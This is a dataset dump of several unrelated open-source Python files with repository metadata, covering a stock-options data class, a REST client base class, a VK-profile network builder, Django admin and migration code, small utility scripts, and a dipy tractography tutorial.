self.date = utils.convertDateToString(dailyData['date'])
self.stkOptOpenPrice = dailyData['stkOptOpenPrice']
self.stkOptHighPrice = dailyData['stkOptHighPrice']
self.stkOptLowPrice = dailyData['stkOptLowPrice']
self.stkOptClosePrice = dailyData['stkOptClosePrice']
self.stkOptSettlePrice = dailyData['stkOptSettlePrice']
self.stkOptContracts = dailyData['stkOptContracts']
self.stkOptValueInLakhs = dailyData['stkOptValueInLakhs']
self.stkOptOpenInterest = dailyData['stkOptOpenInterest']
self.stkOptChangeInOpenInterest = dailyData['stkOptChangeInOpenInterest']
def getDailyDatainListForm(self):
returnList = []
returnList.append(self.date)
returnList.append(self.stkOptOpenPrice)
returnList.append(self.stkOptHighPrice)
returnList.append(self.stkOptLowPrice)
returnList.append(self.stkOptClosePrice)
returnList.append(self.stkOptSettlePrice)
returnList.append(self.stkOptContracts)
returnList.append(self.stkOptValueInLakhs)
returnList.append(self.stkOptOpenInterest)
returnList.append(self.stkOptChangeInOpenInterest)
return returnList
def getDailyDataInfo(self):
returnData = {}
returnData.update({'date': self.date})
returnData.update({'stkOptOpenPrice': self.stkOptOpenPrice})
returnData.update({'stkOptHighPrice': self.stkOptHighPrice})
returnData.update({'stkOptLowPrice': self.stkOptLowPrice})
returnData.update({'stkOptClosePrice': self.stkOptClosePrice})
returnData.update({'stkOptSettlePrice': self.stkOptSettlePrice})
returnData.update({'stkOptContracts': self.stkOptContracts})
returnData.update({'stkOptValueInLakhs': self.stkOptValueInLakhs})
returnData.update({'stkOptOpenInterest': self.stkOptOpenInterest})
returnData.update({'stkOptChangeInOpenInterest': self.stkOptChangeInOpenInterest})
return returnData
def getStkOptDate(self):
return self.date
def getStkOptOpenPrice(self):
return self.stkOptOpenPrice
def getStkOptHighPrice(self):
return self.stkOptHighPrice
def getStkOptLowPrice(self):
return self.stkOptLowPrice
def getStkOptClosePrice(self):
return self.stkOptClosePrice
def getStkOptSettlePrice(self):
return self.stkOptSettlePrice
def getStkOptContracts(self):
return self.stkOptContracts
def getStkOptValueInLakhs(self):
return self.stkOptValueInLakhs
def getStkOptOpenInterest(self):
return self.stkOptOpenInterest
def getStkOptChangeInOpenInterest(self):
return self.stkOptChangeInOpenInterest
def printTypesOfDailyDataFields(self):
print('type(date) : ', type(self.date))
print('type(stkOptOpenPrice) : ', type(self.stkOptOpenPrice))
print('type(stkOptHighPrice) : ', type(self.stkOptHighPrice))
print('type(stkOptLowPrice) : ', type(self.stkOptLowPrice))
print('type(stkOptClosePrice) : ', type(self.stkOptClosePrice))
print('type(stkOptSettlePrice) : ', type(self.stkOptSettlePrice))
print('type(stkOptContracts) : ', type(self.stkOptContracts))
print('type(stkOptValueInLakhs) : ', type(self.stkOptValueInLakhs))
print('type(stkOptOpenInterest) : ', type(self.stkOptOpenInterest))
print('type(stkOptChangeInOpenInterest) : ', type(self.stkOptChangeInOpenInterest))
def printDailyData(self) :
print('date : ', self.date)
print('stkOptOpenPrice : ', self.stkOptOpenPrice)
print('stkOptHighPrice : ', self.stkOptHighPrice)
print('stkOptLowPrice : ', self.stkOptLowPrice)
print('stkOptClosePrice : ', self.stkOptClosePrice)
print('stkOptSettlePrice : ', self.stkOptSettlePrice)
print('stkOptContracts : ', self.stkOptContracts)
print('stkOptValueInLakhs : ', self.stkOptValueInLakhs)
print('stkOptOpenInterest : ', self.stkOptOpenInterest)
print('stkOptChangeInOpenInterest : ', self.stkOptChangeInOpenInterest) | 48.270833 | 95 | 0.645878 | 321 | 4,634 | 9.311526 | 0.133956 | 0.05353 | 0.066912 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.259819 | 4,634 | 96 | 96 | 48.270833 | 0.871429 | 0 | 0 | 0 | 0 | 0 | 0.219202 | 0.057389 | 0 | 0 | 0 | 0 | 0 | 1 | 0.185185 | false | 0 | 0.012346 | 0.123457 | 0.358025 | 0.271605 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
af080e2b64d93029d96213945225bd76584d1bfa | 4,692 | py | Python | nuaal/connections/api/RestBase2.py | mihudec/nuaal | c5c50c59e8a1f2b3f0f6a5266f4dd392befc13cd | [
"Apache-2.0"
] | null | null | null | nuaal/connections/api/RestBase2.py | mihudec/nuaal | c5c50c59e8a1f2b3f0f6a5266f4dd392befc13cd | [
"Apache-2.0"
] | null | null | null | nuaal/connections/api/RestBase2.py | mihudec/nuaal | c5c50c59e8a1f2b3f0f6a5266f4dd392befc13cd | [
"Apache-2.0"
] | null | null | null | import timeit
import logging
import requests
from requests.auth import HTTPBasicAuth
from requests.exceptions import ConnectionError, Timeout
import json
import os
from nuaal.definitions import DATA_PATH
from nuaal.utils import get_logger
class RestBase2(object):
"""
Parent class for all REST-like connections
"""
def __init__(self, url, username=None, password=None, api_base_path=None, verify_ssl=False, DEBUG=False, con_type=None):
"""
:param url: URL or IP address of the target machine
:param username: Username for authentication
:param password: Password for authentication
:param api_base_path: Base path for the API resource, such as "/api/v1"
:param verify_ssl: Enable SSL certificate verification. For self-signed certificates, set this to False
:param DEBUG: Enable debugging output
:param con_type: String representation of connection type, set by child classes
"""
# Disable logging for external libraries
logging.getLogger("requests").setLevel(logging.WARNING)
logging.getLogger("urllib3").setLevel(logging.WARNING)
self.url = url
self.logger = get_logger(name="{}-{}".format(con_type if con_type else 'REST', self.url), DEBUG=DEBUG)
self.username = username
self.password = password
self.api_base_path = api_base_path
self.verify_ssl = verify_ssl
self.DEBUG = DEBUG
self.path_base = self.url + self.api_base_path
self.headers = {"Content-type": "application/json"}
self.common_headers = {"headers": self.headers, "verify": self.verify_ssl}
self.authorized = False
def _initialize(self):
"""
Function for credentials loading and session preparation. Might be overwritten in child classes
:return: ``None``
"""
if not self.verify_ssl:
# Disable certificate warning
try:
requests.packages.urllib3.disable_warnings()
except:
self.logger.warning(msg="Failed to disable Certificate Warnings")
if self.username is None or self.password is None:
self.logger.info(msg="No credentials provided, using cached instead.")
if self._load_credentials():
self.logger.info(msg="Credentials successfully loaded.")
else:
self.logger.info(msg="Failed to load valid credentials.")
else:
self._authorize()
def _authorize(self):
"""
Connection-specific function for handling authorization. Overridden by child classes
:return: ``None``
"""
pass
def _store_data(self, data, path):
path = os.path.join(DATA_PATH, path)
try:
with open(file=path, mode="w") as f:
json.dump(obj=data, fp=f, indent=2)
except Exception as e:
self.logger.error(msg="Could not store data to file '{}'. Exception: {}".format(path, repr(e)))
def _load_data(self, path):
data = None
path = os.path.join(DATA_PATH, path)
try:
with open(file=path, mode="r") as f:
data = json.load(fp=f)
except Exception as e:
self.logger.error(msg="Could not load data from file '{}'. Exception: {}".format(path, repr(e)))
finally:
return data
def _store_credentials(self):
"""
Connection-specific function for handling authorization. Overridden by child classes
:return: ``None``
"""
pass
def _load_credentials(self):
"""
Connection-specific function for handling authorization. Overridden by child classes
:return: ``None``
"""
pass
def request(self, method="GET", path="", raw=False, **kwargs):
if not self.authorized:
try:
self._authorize()
except Exception as e:
self.logger.critical("Failed to authorize.")
finally:
if not self.authorized:
return None, None
response = None
url = self.path_base + path if path[0] == "/" else path
try:
response = requests.request(method=method, url=url, **kwargs, **self.common_headers)
except requests.exceptions.ConnectionError:
self.logger.critical(msg="Could not connect to {}".format(self.url))
if raw:
return response, response.status_code
else:
status_code = response.status_code
if status_code == 200:
return response.json(), status_code
| 36.092308 | 124 | 0.612532 | 545 | 4,692 | 5.176147 | 0.284404 | 0.031904 | 0.019497 | 0.031195 | 0.204537 | 0.204537 | 0.174761 | 0.174761 | 0.174761 | 0.174761 | 0 | 0.002707 | 0.291347 | 4,692 | 129 | 125 | 36.372093 | 0.845714 | 0.207374 | 0 | 0.268293 | 0 | 0 | 0.102681 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.097561 | false | 0.073171 | 0.109756 | 0 | 0.268293 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
af0a713f63ad7b9f547d2566aba51e999d586ae3 | 4,005 | py | Python | code/fields2network.py | alexeyknorre/PyVK | 5b93032f8296d58b53776107c48e9954eb4ce2c0 | [
"MIT"
] | null | null | null | code/fields2network.py | alexeyknorre/PyVK | 5b93032f8296d58b53776107c48e9954eb4ce2c0 | [
"MIT"
] | null | null | null | code/fields2network.py | alexeyknorre/PyVK | 5b93032f8296d58b53776107c48e9954eb4ce2c0 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Mon Jul 04 13:44:10 2016
@author: Alexey
"""
import pandas as pd
import operator
from transliterate import translit, get_available_language_codes
import re
csv = '../results/profiles.csv'
## test
# csv = '../tests/profiles.csv'
# PAJEK_EDGELIST = '../tests/test_edgelist.net'
# field = "music"
# minimum_occurences = 25
USELESS_WORDS = u'разная|разное|разные|по настроению|под настроение|меломанка|меломан|всякая|все|всякая|нету|зависит от настроения|слушаю всё|всё|нет|_|'
def read_data(fields, csv=csv):
columns = ["uid"] + fields.split(',')
df = pd.read_csv(csv, na_values=["[]"],
usecols=columns, encoding="utf-8")
fields = fields.split(',')
query = '+", " + '.join('df["{0}"]'.format(field) for field in fields)
exec("df['field'] = " + query)
df['field'] = df['field'].str.lower()
df = df.dropna(subset=['field'])
return df
def clean_data(df):
# Remove weird characters
df = df.str.replace('[!_@#¶()]', '', case=False)
# Remove useless words
df = df.str.replace(USELESS_WORDS, '')
# Remove stacks of characters like 00000000
return df.str.replace(r'(.)\1{4,}', '')
def get_sorted_dict(df):
music_freq = {}
for field in df:
elements = field.split(",")
for element in elements:
element = element.strip()
if element in music_freq:
music_freq[element] += 1
else:
music_freq[element] = 1
return music_freq, sorted(music_freq.items(), key=operator.itemgetter(1), reverse=True)
def show_sorted_dict(sorted_dict, elements=50):
for i in range(elements):
print sorted_dict[i][0], sorted_dict[i][1]
def get_arcs(df, vertices):
print "Getting arcs..."
arcs = {}
c = 0
for field in df:
c += 1
if c % 1000 == 0:
print c
elements = []
elements_raw = field.split(",")
for element in elements_raw:
elements.append(element.strip())
for element in elements:
if element not in vertices:
continue
other_elements = elements
other_elements.remove(element)
vertice_from = vertices.index(element)
if other_elements is not None:
for other_element in other_elements:
if other_element not in vertices:
continue
vertice_to = vertices.index(other_element)
# Add 1 so arcs index starts with 1
arc = (vertice_from + 1, vertice_to + 1)
if arc in arcs:
arcs[arc] += 1
else:
arcs[arc] = 1
return arcs
def get_vertices(sorted_dict, minimum_occurences):
print "Getting vertices..."
vertices = []
for i in sorted_dict:
if i[1] >= minimum_occurences and len(i[0]) > 2:
vertices.append(i[0])
return vertices
def save_edgelist(vertices, arcs, fields):
print "Saving..."
PAJEK_EDGELIST = '../results/'+fields+'.net'
with open(PAJEK_EDGELIST, 'wb') as f:
f.write("*Vertices " + str(len(vertices)) + "\r\n")
c = 0
for i in vertices:
c += 1
# Transliterate for Pajek
i = translit(i, "ru", reversed=True)
# Leave only literals and _ for Pajek
i = re.sub("[\W_]+", "_", i)
f.write(str(c) + ' "' + str(i.encode("utf-8")) + '"\r\n')
f.write("*Arcs \r\n")
for i in arcs.items():
f.write(str(i[0][0]) + " " + str(i[0][1]) + " " + str(i[1]) + "\r\n")
def csv2pajek(fields, minimum_occurences):
df = read_data(fields)
df_clean = clean_data(df['field'])
music_freq, srt = get_sorted_dict(df_clean)[0], get_sorted_dict(df_clean)[1]
v = get_vertices(srt, minimum_occurences)
arcs = get_arcs(df_clean, v)
save_edgelist(v, arcs, fields)
| 30.112782 | 153 | 0.566042 | 514 | 4,005 | 4.280156 | 0.309339 | 0.040909 | 0.010909 | 0.020455 | 0.070909 | 0.027273 | 0 | 0 | 0 | 0 | 0 | 0.021986 | 0.29588 | 4,005 | 132 | 154 | 30.340909 | 0.757801 | 0.080649 | 0 | 0.131868 | 0 | 0.010989 | 0.097311 | 0.02911 | 0.010989 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.043956 | null | null | 0.054945 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
af1643d50d57eb06abf610b77d5aa52c2a3c6942 | 2,130 | py | Python | skytour/skytour/apps/solar_system/admin.py | ursomniac/skytour | 3320d96d7ca41b8f52ede87e7112477902a37a0e | [
"MIT"
] | null | null | null | skytour/skytour/apps/solar_system/admin.py | ursomniac/skytour | 3320d96d7ca41b8f52ede87e7112477902a37a0e | [
"MIT"
] | 1 | 2022-03-17T01:19:23.000Z | 2022-03-17T01:19:23.000Z | skytour/skytour/apps/solar_system/admin.py | ursomniac/skytour | 3320d96d7ca41b8f52ede87e7112477902a37a0e | [
"MIT"
] | null | null | null | from django.contrib import admin
from ..abstract.admin import AbstractObservation, ObservableObjectAdmin
from .models import (
Asteroid, AsteroidObservation,
Comet, CometObservation,
Planet, PlanetObservation,
MoonObservation,
MeteorShower,
)
class AsteroidObservationAdmin(AbstractObservation):
model = AsteroidObservation
class CometObservationAdmin(AbstractObservation):
model = CometObservation
class PlanetObservationAdmin(AbstractObservation):
model = PlanetObservation
class MoonObservationAdmin(AbstractObservation):
model = MoonObservation
class MeteorShowerAdmin(admin.ModelAdmin):
model = MeteorShower
list_display = ['pk', 'name', 'radiant_ra', 'radiant_dec', 'start_date', 'peak_date', 'end_date', 'zhr']
search_fields = ['name']
fieldsets = (
(None, {
'fields': [
('name', 'slug'),
('start_date', 'peak_date', 'end_date'),
('radiant_ra', 'radiant_dec', 'longitude'),
('speed', 'zhr', 'parent_body'),
'notes',
]
}),
)
class PlanetAdmin(ObservableObjectAdmin):
model = Planet
list_display = [
'pk', 'name', 'diameter', 'load', 'moon_list', 'n_obs', 'obs_date'
]
list_display_links = ['pk', 'name']
readonly_fields = ['moon_list',]
inlines = [PlanetObservationAdmin]
save_on_top = True
class AsteroidAdmin(ObservableObjectAdmin):
model = Asteroid
list_display = ['number', 'name', 'diameter', 'est_brightest', 'h', 'n_obs', 'obs_date']
list_display_links = ['number', 'name']
inlines = [AsteroidObservationAdmin]
save_on_top = True
class CometAdmin(ObservableObjectAdmin):
model = Comet
list_display = ['pk', 'name', 'status', 'n_obs', 'obs_date']
list_display_links = ['pk', 'name']
inlines = [CometObservationAdmin]
save_on_top = True
admin.site.register(MeteorShower, MeteorShowerAdmin)
admin.site.register(Planet, PlanetAdmin)
admin.site.register(Asteroid, AsteroidAdmin)
admin.site.register(Comet, CometAdmin)
admin.site.register(MoonObservation) | 31.791045 | 108 | 0.671362 | 196 | 2,130 | 7.102041 | 0.352041 | 0.055316 | 0.061063 | 0.036638 | 0.127155 | 0.101293 | 0.06681 | 0.047414 | 0.047414 | 0 | 0 | 0 | 0.203286 | 2,130 | 67 | 109 | 31.791045 | 0.820271 | 0 | 0 | 0.086207 | 0 | 0 | 0.139371 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.051724 | 0 | 0.603448 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
af199e4897719a80335ff5ec4f44958d12eb6383 | 2,570 | py | Python | analyze.py | dangoldin/annual-stats-analysis | 8aac0c864ce9ab7d602a656f7a529dbcb04eae95 | [
"MIT"
] | null | null | null | analyze.py | dangoldin/annual-stats-analysis | 8aac0c864ce9ab7d602a656f7a529dbcb04eae95 | [
"MIT"
] | null | null | null | analyze.py | dangoldin/annual-stats-analysis | 8aac0c864ce9ab7d602a656f7a529dbcb04eae95 | [
"MIT"
] | null | null | null | #!/usr/bin/python
import sys, csv, re, pprint, math
from collections import namedtuple, Counter
RE_ALL_NUM = re.compile(r'[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?')
Row = namedtuple('Row', ('date','sleep','wakeup','physical_morning','physical_day','physical_evening','mood_morning','mood_day','mood_evening','food','drink','coffee','tea','soda'))
def sleep_duration(sleep, wakeup):
sleep = float(sleep)
wakeup = float(wakeup)
if sleep < wakeup:
return wakeup - sleep
return wakeup - (sleep - 12.0)
def read_file(fn):
with open(fn, 'r') as f:
r = csv.reader(f, delimiter=',')
r.next() # Skip header
return [Row(*l) for l in r]
def count_dim(rows, dim):
return Counter(getattr(r, dim) for r in rows)
def total_num(val):
nums = RE_ALL_NUM.findall(val)
return sum(float(x[0]) for x in nums)
def total_map(maps):
c = Counter()
for m in maps:
c.update(to_num_map(m))
return c
def to_num_map(m):
return dict((k, float(v)) for k, v in m.iteritems())
def num_map(row):
return dict(reversed(p.strip('-').strip().split(' ', 1)) for p in row.split("\n") if len(p) > 0)
def stats(d):
s = sum(d)
avg = s/len(d)
max_ = max(d)
min_ = min(d)
s2 = sum((i-avg)*(i-avg) for i in d)
var = s2/len(d)
std = math.sqrt(var)
return {
'total': s,
'avg': avg,
'max' : max_,
'min' : min_,
'var' : var,
'std' : std,
}
def summarize(rows):
cnt_p_m = count_dim(rows, 'physical_morning')
cnt_p_d = count_dim(rows, 'physical_day')
cnt_p_e = count_dim(rows, 'physical_evening')
cnt_m_m = count_dim(rows, 'mood_morning')
cnt_m_d = count_dim(rows, 'mood_day')
cnt_m_e = count_dim(rows, 'mood_evening')
sleep_stats = stats([sleep_duration(r.sleep, r.wakeup) for r in rows])
coffee_stats = stats([float(r.coffee) for r in rows])
drink_stats = stats([total_num(r.drink) for r in rows])
drink_details = total_map([num_map(r.drink) for r in rows])
return {
'p_m': cnt_p_m,
'p_d': cnt_p_d,
'p_e': cnt_p_e,
'm_m': cnt_m_m,
'm_d': cnt_m_d,
'm_e': cnt_m_e,
'sleep_stats': sleep_stats,
'coffee_stats': coffee_stats,
'drink_stats': drink_stats,
'drink_details': drink_details,
}
if __name__ == '__main__':
if len(sys.argv) != 2:
print 'Specify a filename'
exit(1)
fn = sys.argv[1]
rows = read_file(fn)
summary = summarize(rows)
pprint.pprint(summary, width=2)
| 26.494845 | 181 | 0.589883 | 406 | 2,570 | 3.509852 | 0.263547 | 0.039298 | 0.058947 | 0.035088 | 0.057544 | 0.022456 | 0 | 0 | 0 | 0 | 0 | 0.006176 | 0.243969 | 2,570 | 96 | 182 | 26.770833 | 0.727226 | 0.010895 | 0 | 0.026316 | 0 | 0 | 0.137008 | 0.015354 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.026316 | null | null | 0.039474 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
af1c0b691c86765c21e591aade803cbb04e16f02 | 356 | py | Python | apps/data/migrations/0071_rename_code_id_taibifcode_objid.py | Jeffersonktw/portal20 | 3db8ef9379410d589202bcac40b667a63872c8ea | [
"MIT"
] | null | null | null | apps/data/migrations/0071_rename_code_id_taibifcode_objid.py | Jeffersonktw/portal20 | 3db8ef9379410d589202bcac40b667a63872c8ea | [
"MIT"
] | null | null | null | apps/data/migrations/0071_rename_code_id_taibifcode_objid.py | Jeffersonktw/portal20 | 3db8ef9379410d589202bcac40b667a63872c8ea | [
"MIT"
] | null | null | null | # Generated by Django 3.2.7 on 2022-01-06 03:42
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('data', '0070_taibifcode'),
]
operations = [
migrations.RenameField(
model_name='taibifcode',
old_name='code_id',
new_name='objid',
),
]
| 18.736842 | 47 | 0.575843 | 38 | 356 | 5.263158 | 0.815789 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.077236 | 0.308989 | 356 | 18 | 48 | 19.777778 | 0.735772 | 0.126404 | 0 | 0 | 1 | 0 | 0.132686 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
af1da69987c607f169e992928bfd2a046a0267de | 288 | py | Python | 1-beginner/1074.py | alenvieira/uri-online-judge-solutions | ca5ae7064d84af4dae12fc37d4d14ee441e49d06 | [
"MIT"
] | null | null | null | 1-beginner/1074.py | alenvieira/uri-online-judge-solutions | ca5ae7064d84af4dae12fc37d4d14ee441e49d06 | [
"MIT"
] | null | null | null | 1-beginner/1074.py | alenvieira/uri-online-judge-solutions | ca5ae7064d84af4dae12fc37d4d14ee441e49d06 | [
"MIT"
] | null | null | null | n = int(input())
values = [int(input()) for _ in range(n)]
for value in values:
msg = 'ODD '
if value % 2 == 0:
msg = 'EVEN '
if value < 0:
msg = msg + 'NEGATIVE'
elif value > 0:
msg = msg + 'POSITIVE'
else:
msg = 'NULL'
print(msg)
| 20.571429 | 41 | 0.479167 | 39 | 288 | 3.512821 | 0.512821 | 0.087591 | 0.131387 | 0.175182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022099 | 0.371528 | 288 | 13 | 42 | 22.153846 | 0.734807 | 0 | 0 | 0 | 0 | 0 | 0.100694 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
af1e6cb4f796533701e76e497ff7a7e2738a483f | 342 | py | Python | service/util/log.py | mutouxia/kamiFaka | d5750de11de86f7a961ada4c11dd9f7ccaa38f12 | [
"MIT"
] | 717 | 2020-10-18T05:24:17.000Z | 2022-03-30T11:47:16.000Z | service/util/log.py | mutouxia/kamiFaka | d5750de11de86f7a961ada4c11dd9f7ccaa38f12 | [
"MIT"
] | 42 | 2020-10-22T15:37:22.000Z | 2022-02-27T04:52:27.000Z | service/util/log.py | mutouxia/kamiFaka | d5750de11de86f7a961ada4c11dd9f7ccaa38f12 | [
"MIT"
] | 267 | 2020-10-26T09:04:30.000Z | 2022-03-30T05:52:04.000Z | import time
# 定义日志记录器
# import sys
# def get_cur_info():
# return sys._getframe().f_code.co_filename + ' 第' + str(sys._getframe().f_lineno)+'行'
# 获取具体路径位置
# get_cur_info()
def log(msg):
with open('service.log','a',encoding='utf=8') as f:
f.write('\n' + time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()) +' '+ str(msg)) | 24.428571 | 91 | 0.608187 | 55 | 342 | 3.618182 | 0.690909 | 0.060302 | 0.100503 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003497 | 0.163743 | 342 | 14 | 91 | 24.428571 | 0.692308 | 0.444444 | 0 | 0 | 0 | 0 | 0.201087 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.25 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
af20c0a712f660c07e5c2681caabbc7632976ab2 | 301 | py | Python | test/deprecated/test6.py | davidliyutong/Flint | 4e2552dac8d781c21e8998ad68bbf1b986b09258 | [
"MIT"
] | null | null | null | test/deprecated/test6.py | davidliyutong/Flint | 4e2552dac8d781c21e8998ad68bbf1b986b09258 | [
"MIT"
] | 1 | 2020-07-08T02:57:50.000Z | 2020-07-08T02:57:50.000Z | test/deprecated/test6.py | davidliyutong/Flint | 4e2552dac8d781c21e8998ad68bbf1b986b09258 | [
"MIT"
] | null | null | null | import numpy as np
import scipy.linalg.blas as blas
import numba.cuda as cuda
import pyculib.blas as cublas
A = np.random.randn(3, 3)
B = np.random.randn(3, 3)
C = blas.sgemm(1.0, A, B)
print(C)
A_d = cuda.to_device(A)
B_d = cuda.to_device(B)
C_d = cublas.gemm("N", "N", 1.0, A_d, B_d)
print(C_d)
| 17.705882 | 42 | 0.681063 | 68 | 301 | 2.897059 | 0.382353 | 0.060914 | 0.13198 | 0.142132 | 0.152284 | 0 | 0 | 0 | 0 | 0 | 0 | 0.031621 | 0.159468 | 301 | 16 | 43 | 18.8125 | 0.747036 | 0 | 0 | 0 | 0 | 0 | 0.006645 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
af37533e55a971d42bae3b017760683c860705c1 | 3,922 | py | Python | env/share/doc/dipy/examples/tracking_eudx_tensor.py | Raniac/NEURO-LEARN | 3c3acc55de8ba741e673063378e6cbaf10b64c7a | [
"Apache-2.0"
] | 8 | 2019-05-29T09:38:30.000Z | 2021-01-20T03:36:59.000Z | env/share/doc/dipy/examples/tracking_eudx_tensor.py | Raniac/neurolearn_dev | 3c3acc55de8ba741e673063378e6cbaf10b64c7a | [
"Apache-2.0"
] | 12 | 2021-03-09T03:01:16.000Z | 2022-03-11T23:59:36.000Z | env/share/doc/dipy/examples/tracking_eudx_tensor.py | Raniac/NEURO-LEARN | 3c3acc55de8ba741e673063378e6cbaf10b64c7a | [
"Apache-2.0"
] | 1 | 2020-07-17T12:49:49.000Z | 2020-07-17T12:49:49.000Z | """
=================================================
Deterministic Tracking with EuDX on Tensor Fields
=================================================
In this example we do deterministic fiber tracking on Tensor fields with EuDX
[Garyfallidis12]_.
This example requires to import example `reconst_dti.py` to run. EuDX was
primarily made with cpu efficiency in mind. Therefore, it should be useful to
give you a quick overview of your reconstruction results with the help of
tracking.
"""
import os
import numpy as np
import nibabel as nib
if not os.path.exists('tensor_fa.nii.gz'):
import reconst_dti
"""
EuDX will use the directions (eigen vectors) of the Tensors to propagate
streamlines from voxel to voxel and fractional anisotropy to stop tracking.
"""
fa_img = nib.load('tensor_fa.nii.gz')
FA = fa_img.get_data()
evecs_img = nib.load('tensor_evecs.nii.gz')
evecs = evecs_img.get_data()
"""
In the background of the image the fitting will not be accurate because there all
measured signal is mostly noise and possibly we will find FA values with nans
(not a number). We can easily remove these in the following way.
"""
FA[np.isnan(FA)] = 0
"""
EuDX takes as input discretized voxel directions on a unit sphere. Therefore,
it is necessary to discretize the eigen vectors before feeding them in EuDX.
For the discretization procedure we use an evenly distributed sphere of 724
points which we can access using the get_sphere function.
"""
from dipy.data import get_sphere
sphere = get_sphere('symmetric724')
"""
We use quantize_evecs (evecs here stands for eigen vectors) to apply the
discretization.
"""
from dipy.reconst.dti import quantize_evecs
peak_indices = quantize_evecs(evecs, sphere.vertices)
"""
EuDX is the fiber tracking algorithm that we use in this example.
The most important parameters are the first one which represents the
magnitude of the peak of a scalar anisotropic function, the
second which represents the indices of the discretized directions of
the peaks and odf_vertices are the vertices of the input sphere.
"""
from dipy.tracking.eudx import EuDX
from dipy.tracking.streamline import Streamlines
eu = EuDX(FA.astype('f8'), peak_indices, seeds=50000,
odf_vertices=sphere.vertices, a_low=0.2)
tensor_streamlines = Streamlines(eu)
"""
We can now save the results in the disk. For this purpose we can use the
TrackVis format (``*.trk``). First, we need to import ``save_trk`` function.
"""
from dipy.io.streamline import save_trk
"""
Save the streamlines.
"""
ten_sl_fname = 'tensor_streamlines.trk'
save_trk(ten_sl_fname, tensor_streamlines,
affine=np.eye(4),
vox_size=fa_img.header.get_zooms()[:3],
shape=FA.shape)
"""
If you don't want to use Trackvis to visualize the file you can use our
lightweight `dipy.viz` module.
"""
try:
from dipy.viz import window, actor
except ImportError:
raise ImportError('Python fury module is not installed')
import sys
sys.exit()
"""
Create a scene.
"""
ren = window.Renderer()
"""
Every streamline will be coloured according to its orientation
"""
from dipy.viz import colormap as cmap
"""
`actor.line` creates a streamline actor for streamline visualization
and `ren.add` adds this actor to the scene
"""
ren.add(actor.streamtube(tensor_streamlines,
cmap.line_colors(tensor_streamlines)))
print('Saving illustration as tensor_tracks.png')
ren.SetBackground(1, 1, 1)
window.record(ren, out_path='tensor_tracks.png', size=(600, 600))
# Enables/disables interactive visualization
interactive = False
if interactive:
window.show(ren)
"""
.. figure:: tensor_tracks.png
:align: center
Deterministic streamlines with EuDX on a Tensor Field.
References
----------
